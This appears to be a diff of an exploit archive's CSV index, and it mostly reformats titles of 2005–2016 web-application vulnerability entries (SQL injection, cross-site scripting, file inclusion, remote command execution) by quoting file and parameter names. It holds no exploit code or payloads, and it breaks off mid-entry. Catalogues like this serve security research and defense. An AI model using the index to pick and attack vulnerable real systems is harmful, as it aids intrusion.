25746,platforms/php/webapps/25746.txt,"NPDS 4.8 < 5.0 - 'reviews.php?title' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25747,platforms/php/webapps/25747.txt,"NPDS 4.8 < 5.0 - 'reply.php?image_subject' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 -25748,platforms/php/webapps/25748.txt,"NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection",2005-05-28,NoSP,php,webapps,0 +25748,platforms/php/webapps/25748.txt,"NPDS 4.8 < 5.0 Glossaire Module - 'terme' SQL Injection",2005-05-28,NoSP,php,webapps,0 25749,platforms/php/webapps/25749.txt,"NPDS 4.8 < 5.0 - 'links.php?Query' SQL Injection",2005-05-28,NoSP,php,webapps,0 25750,platforms/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - 'faq.php?categories' Cross-Site Scripting",2005-05-28,NoSP,php,webapps,0 25751,platforms/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",asp,webapps,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - 'resellerresources.asp?jresourceid' SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 -25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 +25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - 'plandetails.asp' Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",asp,webapps,0 40391,platforms/php/webapps/40391.txt,"WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure",2016-09-19,david-peltier,php,webapps,80 @@ -28512,13 +28513,13 @@ id,file,description,date,author,platform,type,port 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 33411,platforms/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink and Essandre",php,webapps,0 -33412,platforms/php/webapps/33412.txt,"iSupport 1.8 - 'index.php' which Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 +33412,platforms/php/webapps/33412.txt,"iSupport 1.8 - 'index.php?which' Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - '/core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 33418,platforms/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 33419,platforms/php/webapps/33419.txt,"F3Site 2009 - '/mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 -33420,platforms/php/webapps/33420.txt,"F3Site 2009 - '/mod/new.php' GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 +33420,platforms/php/webapps/33420.txt,"F3Site 2009 - '/mod/new.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 40390,platforms/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps,0 33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 @@ -28544,10 +28545,10 @@ id,file,description,date,author,platform,type,port 25798,platforms/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - 'OptionFieldsEdit.asp?idccr' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php?where' Full Path Disclosure",2005-06-07,SecWatch,php,webapps,0 25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-07,SecWatch,php,webapps,0 -25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 +25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - 'referer.php' Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 -25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 - default.asp SQL Injection",2005-06-08,hack_912,asp,webapps,0 -25805,platforms/asp/webapps/25805.txt,"Loki Download Manager 2.0 - Catinfo.asp SQL Injection",2005-06-08,hack_912,asp,webapps,0 +25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 - 'default.asp' SQL Injection",2005-06-08,hack_912,asp,webapps,0 +25805,platforms/asp/webapps/25805.txt,"Loki Download Manager 2.0 - 'Catinfo.asp' SQL Injection",2005-06-08,hack_912,asp,webapps,0 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",hardware,webapps,0 @@ -28555,28 +28556,28 @@ id,file,description,date,author,platform,type,port 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php?show_course' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php?subject' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php?cid' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php?l' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 -25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - '/inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - '/inbox/index.php?view' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 -25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php?us' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps,0 25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0 25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0 25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections",2005-06-20,"Dedi Dwianto",asp,webapps,0 25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25845,platforms/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - Trackback.asp Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 +25845,platforms/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - 'Trackback.asp' Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 +25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - 'User' Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 -26291,platforms/asp/webapps/26291.txt,"Mall23 - AddItem.asp SQL Injection",2005-08-21,SmOk3,asp,webapps,0 +26291,platforms/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,asp,webapps,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 @@ -28613,7 +28614,7 @@ id,file,description,date,author,platform,type,port 25887,platforms/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25889,platforms/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - 'reply.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25890,platforms/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php' name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25890,platforms/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25891,platforms/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 @@ -28629,22 +28630,22 @@ id,file,description,date,author,platform,type,port 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - 'forgot_password.asp?email' Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - 'register.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-06-27,"Alberto Trivero",asp,webapps,0 -25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 - Language_Select.asp HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 +25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 - 'Language_Select.asp' HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 25908,platforms/asp/webapps/25908.txt,"ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 -25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 - IP Parameter HTML Injection",2005-06-27,Megabyte,php,webapps,0 +25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 - 'IP' HTML Injection",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums - 'SearchResults.aspx' Cross-Site Scripting",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 -25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 - error.asp Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 +25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 - 'error.asp' Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,php,webapps,0 -25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0 +25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - 'Graph_Image.php' Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps,0 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution",2005-06-29,blahplok,cgi,webapps,0 25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 - 'Read.php' SQL Injection",2004-10-24,"Positive Technologies",php,webapps,0 -25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - login.cgi File Parameter Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 -25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 +25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - 'login.cgi?File' Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 +25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - '20review.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 +25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - '10expand.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php?inc' Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 -25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 +25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - '10browse.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25929,platforms/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'popup.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -28672,8 +28673,8 @@ id,file,description,date,author,platform,type,port 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 -25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 -25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 +25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 +25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 @@ -28682,12 +28683,12 @@ id,file,description,date,author,platform,type,port 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps,0 -25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - Forum.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 -25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 -25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - Thread.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 -25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - Search.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - 'Thread.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - 'Search.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0 -25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 +25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - 'update.php' Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 @@ -28700,8 +28701,8 @@ id,file,description,date,author,platform,type,port 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0 26012,platforms/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,webapps,80 -26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 -26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 +26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - 'Processform.php3?Name' Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 +26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - 'Processform.php3?Failed' Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 @@ -28716,7 +28717,7 @@ id,file,description,date,author,platform,type,port 26029,platforms/php/webapps/26029.txt,"Netquery 3.1 - 'nqports2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps,0 26030,platforms/php/webapps/26030.txt,"Netquery 3.1 - 'portlist.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 - 'show.php' SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 -26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 +26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - 'viewcart.asp' Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - 'Guestbook.php' Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - 'Demo.php' Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 @@ -28731,7 +28732,7 @@ id,file,description,date,author,platform,type,port 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - 'profile.php?Username' Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 -26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 +26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php?UserID' Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 @@ -28741,17 +28742,17 @@ id,file,description,date,author,platform,type,port 26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 26058,platforms/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 -26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - index.cfm Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps,0 +26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - 'index.cfm' Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,php,webapps,0 26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 - 'admin.php' SQL Injection",2005-08-01,SVT,php,webapps,0 26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - 'Lost_password.php' Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - 'Shop_Display_Products.php' SQL Injection",2005-08-02,"John Cobb",php,webapps,0 -26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - index.cfm Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 +26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - 'index.cfm' Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management - 'validsession.php?strRootpath' Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 26068,platforms/php/webapps/26068.txt,"Web Content Management - 'list.php?strTable' Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 -26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - Message.asp Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 -26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - default.asp SQL Injection",2005-08-03,basher13,asp,webapps,0 +26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - 'Message.asp' Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 +26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - 'default.asp' SQL Injection",2005-08-03,basher13,asp,webapps,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 - 'index.php' SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin 